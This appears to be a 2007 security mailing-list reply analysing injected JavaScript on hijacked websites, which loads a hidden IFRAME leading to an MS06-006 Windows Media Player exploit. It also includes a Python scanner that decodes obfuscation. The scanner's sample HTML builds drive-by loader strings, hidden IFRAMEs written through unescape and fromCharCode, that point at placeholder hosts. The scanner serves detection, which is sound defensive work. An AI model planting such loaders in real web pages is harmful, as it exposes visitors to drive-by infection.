[Dshield] need help decoding.

Shaun shaun at shaunc.com
Wed Sep 19 02:24:40 GMT 2007


On Tue, 18 Sep 2007 17:18:07 -0700 (PDT)
Dan Jackson <kybowhunter515 at yahoo.com> wrote:

> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> its intent was and to see if it opened up any other holes in the
> server that I need to know about.

That code inserts an IFRAME into the current document. The target of the
IFRAME (munged to prevent accidental clickage) is

ht tp:/ / marcobernardoni . com/x/index.php

Loading that URI with a user-agent which mimics Windows Firefox, I get
back a much longer Javascript. The second script contains another
encoded Javascript which it decodes, writing to the document a third
Javascript which, naturally, is also obfuscated.

The end result attempts to exploit a Windows Media Player vulnerability
(MS06-006). I didn't invoke the malicious .wmv file to see what the
final payload is, as I don't have a proper sandbox right now.

This Javascript in and of itself did not open up any further holes on
your server. That's not to say that the attacker hasn't installed other
malicious code in whatever manner he managed to deploy this little devil.

hth,

-s
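The triage Shaun describes (finding an injected script that writes a hidden IFRAME, then peeling obfuscation layers without running them) can be done statically against the pages recovered from a compromised server. The script below is an added example, not code from either message; it resolves `unescape('%XX...')` and `String.fromCharCode(...)` calls with plain string operations, then lists every IFRAME source, flagging the ones that only appear after decoding and the ones sized or styled to be invisible. The sample HTML and its hostnames are constructed placeholders, not the site or domain in the post.

```python
"""Static scan of HTML for injected IFRAME loaders hidden behind
unescape()/String.fromCharCode() obfuscation. Nothing is executed;
the decoding is string replacement only, so it is safe to run on
recovered pages offline."""
import re
from urllib.parse import unquote, urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)", re.I)
# 1x1 (or 0x0) frames and CSS hiding are the usual tells of a drive-by loader.
HIDDEN_RE = re.compile(
    r"\b(?:width|height)\s*=\s*['\"]?0*[01]\b|display\s*:\s*none|visibility\s*:\s*hidden",
    re.I)


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX for code points, then %XX bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layer(text):
    """Replace each unescape(...) and String.fromCharCode(...) call with the
    literal string it would produce."""
    text = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), text)
    text = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        text)
    return text


def decode_all(text, max_layers=5):
    """Peel nested layers until the text stops changing (bounded)."""
    for _ in range(max_layers):
        new = decode_layer(text)
        if new == text:
            break
        text = new
    return text


def find_iframes(html):
    """Return one dict per IFRAME found after decoding: src, host, whether it
    was only reachable through obfuscation, and whether it is hidden."""
    decoded = decode_all(html)
    plain_srcs = {m.group(1) for m in IFRAME_RE.finditer(html)}
    found = []
    for m in IFRAME_RE.finditer(decoded):
        end = decoded.find(">", m.end())
        tag = decoded[m.start():(end + 1) if end != -1 else len(decoded)]
        src = m.group(1)
        found.append({
            "src": src,
            "host": urlparse(src).hostname,
            "obfuscated": src not in plain_srcs,
            "hidden": bool(HIDDEN_RE.search(tag)),
        })
    return found


def _as_fromcharcode(s):
    """Build a String.fromCharCode(...) call; used only to construct the sample."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"


# Constructed sample page: two injected loaders in the style the post describes
# (a script that document.write()s a tiny IFRAME) plus one ordinary iframe.
# All hostnames are placeholders.
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//malicious.example.invalid/x/index.php%22"
    "%20width%3D1%20height%3D1%3E%3C/iframe%3E'));</script>\n"
    "<script>document.write(" + _as_fromcharcode(
        '<iframe src="http://second.example.invalid/" style="display:none"></iframe>')
    + ");</script>\n"
    '<iframe src="https://partner.example.invalid/widget" width="300" height="250"></iframe>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for f in find_iframes(SAMPLE_HTML):
        flags = [k for k in ("obfuscated", "hidden") if f[k]]
        print(f"{f['host']:32} {f['src']}  {' '.join(flags)}")
```

Run against a directory of recovered pages, the `obfuscated` and `hidden` flags together separate the injected loader from legitimate embeds; the flagged hosts are what to block and to search the rest of the server's content for.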


